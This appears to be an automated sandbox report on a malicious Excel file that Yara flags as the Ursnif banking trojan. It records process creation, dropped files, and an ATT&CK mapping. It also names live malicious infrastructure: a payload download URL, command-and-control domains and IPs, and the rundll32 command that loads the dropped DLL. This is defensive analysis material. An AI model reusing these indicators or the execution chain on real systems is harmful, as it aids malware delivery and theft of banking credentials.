      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServerJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServerJump to behavior
      Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2Jump to behavior
      Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001601 GetModuleHandleW,LoadLibraryW,GetProcAddress,4_2_10001601
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100021E3 push ecx; ret 4_2_100021F3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AC47F push ecx; ret 4_2_001AC48F
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10001601 GetModuleHandleW,LoadLibraryW,GetProcAddress,4_2_10001601
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00180940 mov eax, dword ptr fs:[00000030h]4_2_00180940
      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServerJump to behavior
      Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A212D cpuid 4_2_001A212D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,4_2_001A340B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AAEF6 GetSystemTimeAsFileTime,SetWaitableTimer,4_2_001AAEF6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A212D GetUserNameW,4_2_001A212D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AA06E CreateMutexW,GetLastError,CloseHandle,GetLastError,GetVersionExA,GetModuleHandleA,RtlImageNtHeader,CloseHandle,4_2_001AA06E
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmpBinary or memory string: V%ProgramFiles%\Windows Defender\MSASCui.exe
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - select * from antispywareproduct

      Stealing of Sensitive Information:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation111Path InterceptionProcess Injection12Masquerading121OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumData Obfuscation1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting11Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Scripting11NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Information Discovery26Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      OCC-221220-TBU1XAT7X4.xls3%VirustotalBrowse
      OCC-221220-TBU1XAT7X4.xls0%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png100%AviraHEUR/AGEN.1138179
      C:\Users\user\cnvmb.rty100%AviraHEUR/AGEN.1138179
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png8%ReversingLabsWin32.Malware.Generic
      C:\Users\user\cnvmb.rty8%ReversingLabsWin32.Malware.Generic

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      4.2.rundll32.exe.10000000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      4.2.rundll32.exe.1c0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://hospader.xyz/index.htma;0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      https://hospader.xyz/index.htm0%Avira URL Cloudsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      https://hospader.xyz/index.htmRoot0%Avira URL Cloudsafe
      http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      https://hospader.xyz/index.htmndex.htm0%Avira URL Cloudsafe
      http://companieshouseonlinedownload.com/ox9.png0%Avira URL Cloudsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      https://hospader.xyz0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      https://hospader.xyz/index.htm10%Avira URL Cloudsafe
      https://hospader.xyz/favicon.ico0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      companieshouseonlinedownload.com
      47.254.169.221
      truefalse
        unknown
        hospader.xyz
        45.142.212.128
        truefalse
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://companieshouseonlinedownload.com/ox9.pngtrue
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpfalse
            high
            http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
              high
              https://hospader.xyz/index.htma;rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://investor.msn.comrundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
                  high
                  http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmptrue
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://hospader.xyz/index.htmrundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmp, ~DF3C5C2A9E584434E2.TMP.10.drtrue
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmpfalse
                    high
                    http://wellformedweb.org/CommentAPI/rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmptrue
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://hospader.xyz/index.htmRoot{5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.drtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmptrue
                    • Avira URL Cloud: safe
                    low
                    http://investor.msn.com/rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
                      high
                      http://www.iis.fhg.de/audioPArundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmptrue
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://hospader.xyz/index.htmndex.htm{5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.drtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://computername/printers/printername/.printerrundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      low
                      https://hospader.xyzrundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://www.%s.comPArundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmptrue
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      low
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmptrue
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpfalse
                        high
                        http://treyresearch.netrundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmptrue
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://hospader.xyz/index.htm1rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://hospader.xyz/favicon.icoimagestore.dat.11.drtrue
                        • Avira URL Cloud: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        47.254.169.221
                        unknownUnited States
                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                        45.142.212.128
                        unknownRussian Federation
                        200019ALEXHOSTMDfalse

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:333660
                        Start date:23.12.2020
                        Start time:14:47:49
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 9s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:OCC-221220-TBU1XAT7X4.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.bank.troj.expl.evad.winXLS@10/28@5/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 19.1% (good quality ratio 19.1%)
                        • Quality average: 87.7%
                        • Quality standard deviation: 20.4%
                        HCA Information:
                        • Successful, ratio: 76%
                        • Number of executed functions: 36
                        • Number of non-executed functions: 24
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xls
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 88.221.62.148, 192.35.177.64, 8.248.139.254, 67.27.159.126, 8.253.204.120, 8.248.131.254, 8.248.117.254, 2.20.142.209, 2.20.142.210, 204.79.197.200, 13.107.21.200, 13.107.5.80
                        • Excluded domains from analysis (whitelisted): www.bing.com, au.download.windowsupdate.com.edgesuite.net, dual-a-0001.a-msedge.net, api.bing.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, e11290.dspg.akamaiedge.net, e-0001.e-msedge.net, go.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, apps.digsigtrust.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net, api-bing-com.e-0001.e-msedge.net
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        14:48:43API Interceptor207x Sleep call for process: rundll32.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        ALEXHOSTMDxTWBTe8Yz3.exeGet hashmaliciousBrowse
                        • 176.123.2.251
                        xG4rjYxzCT.dllGet hashmaliciousBrowse
                        • 45.67.229.97
                        svhost.ps1Get hashmaliciousBrowse
                        • 176.123.8.228
                        SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                        • 176.123.0.55
                        IW2g2rzW9x.exeGet hashmaliciousBrowse
                        • 176.123.9.138
                        http://www.4413044130.stormletpet.com./UEt1c3RAc29mdHNvdXJjZS5jby5ueg==#aHR0cHM6Ly9vaGlzLm5nL29mZmljZS9vZjI/L1BLdXN0QHNvZnRzb3VyY2UuY28ubno=Get hashmaliciousBrowse
                        • 176.123.0.55
                        OrM0pS5PdK.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        hffMSxRxrO.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        uUYx0SUnV5.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        jocniwuamG.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        v3ARXpc5fv.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        cj6eP1ytv3.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        cyEM194elj.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        wLS9XGTCOv.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        ykyhMjKWPl.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        B8Rn1nX3cj.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        hVDdUEUTYm.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        pytHAUQXXc.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        q7Mq1T2O1z.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        NGalRIfPXE.exeGet hashmaliciousBrowse
                        • 45.67.229.13
                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCInf_CHB9147.docGet hashmaliciousBrowse
                        • 149.129.52.21
                        59154-2212-122020.docGet hashmaliciousBrowse
                        • 149.129.52.21
                        4evQHr1FEO.exeGet hashmaliciousBrowse
                        • 8.208.28.65
                        LPwuWhMQBV.exeGet hashmaliciousBrowse
                        • 8.208.28.65
                        https://bit.ly/3gWlOK0Get hashmaliciousBrowse
                        • 8.208.92.142
                        https://bit.ly/2LFrQTDGet hashmaliciousBrowse
                        • 8.208.92.142
                        nmode1_u1.exeGet hashmaliciousBrowse
                        • 47.91.78.102
                        REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                        • 205.204.101.158
                        https://bit.ly/3amwxw2Get hashmaliciousBrowse
                        • 8.208.92.142
                        PO#14379 - SO#146001119375 XMAS wood land.exeGet hashmaliciousBrowse
                        • 47.251.51.14
                        https://www.compartirwifi.comGet hashmaliciousBrowse
                        • 198.11.136.21
                        SecuriteInfo.com.Trojan.DownLoader19.23899.32209.exeGet hashmaliciousBrowse
                        • 47.242.46.145
                        SecuriteInfo.com.Trojan.DownLoader19.23899.32209.exeGet hashmaliciousBrowse
                        • 47.242.46.145
                        http://oscf.koojom.com/indexGet hashmaliciousBrowse
                        • 8.208.92.142
                        http://bit.ly/2K9I7Q5Get hashmaliciousBrowse
                        • 8.208.92.142
                        ya.wav.dllGet hashmaliciousBrowse
                        • 8.208.96.63
                        RFQ 00068643 New Order Shipment to Jebel Ali Port UAE.exeGet hashmaliciousBrowse
                        • 47.91.169.15
                        Order No. BCM190282.exeGet hashmaliciousBrowse
                        • 47.242.134.251
                        https://bit.ly/3gKSztCGet hashmaliciousBrowse
                        • 8.208.92.142
                        https://bit.ly/3r7zqa6Get hashmaliciousBrowse
                        • 47.254.170.17

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        7dcce5b76c8b17472d024758970a406bDocument_8297.xlsbGet hashmaliciousBrowse
                        • 45.142.212.128
                        Document_8297.xlsbGet hashmaliciousBrowse
                        • 45.142.212.128
                        info_ (314).xlsmGet hashmaliciousBrowse
                        • 45.142.212.128
                        EHpIMi2I5F.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        jgxmv58TUY.rtfGet hashmaliciousBrowse
                        • 45.142.212.128
                        FRAUD NOTIFICATION 35738-59.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        r4pLtwclv6.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        CITAR REF OT20-0338-01.docxGet hashmaliciousBrowse
                        • 45.142.212.128
                        BOL_860766.xlsmGet hashmaliciousBrowse
                        • 45.142.212.128
                        Document_7647.xlsbGet hashmaliciousBrowse
                        • 45.142.212.128
                        Document_7647.xlsbGet hashmaliciousBrowse
                        • 45.142.212.128
                        RxBaH0oWoR.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        RxBaH0oWoR.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        Nov. P.Order 0053.docxGet hashmaliciousBrowse
                        • 45.142.212.128
                        LETTER OF AUTHORITY 18DEC.xlsxGet hashmaliciousBrowse
                        • 45.142.212.128
                        Order List and Quantities.pptGet hashmaliciousBrowse
                        • 45.142.212.128
                        Email data form.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        AWB DHL EXPRESS .docGet hashmaliciousBrowse
                        • 45.142.212.128
                        PAY SLIP.docGet hashmaliciousBrowse
                        • 45.142.212.128
                        Down Payment.docGet hashmaliciousBrowse
                        • 45.142.212.128

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                        Category:dropped
                        Size (bytes):117872
                        Entropy (8bit):7.994797855729196
                        Encrypted:true
                        SSDEEP:1536:i/LAvEZrGclx0hoW6qCLdNz2p+/LAvEZrGclx0hoW6qCLdNz2pj:UcMqZVCp8pwcMqZVCp8pj
                        MD5:DB381E85D86EA4484D20078E9EC667A6
                        SHA1:4871FDAF0C2EEC8183FC3CE7710B18FD3C647CEA
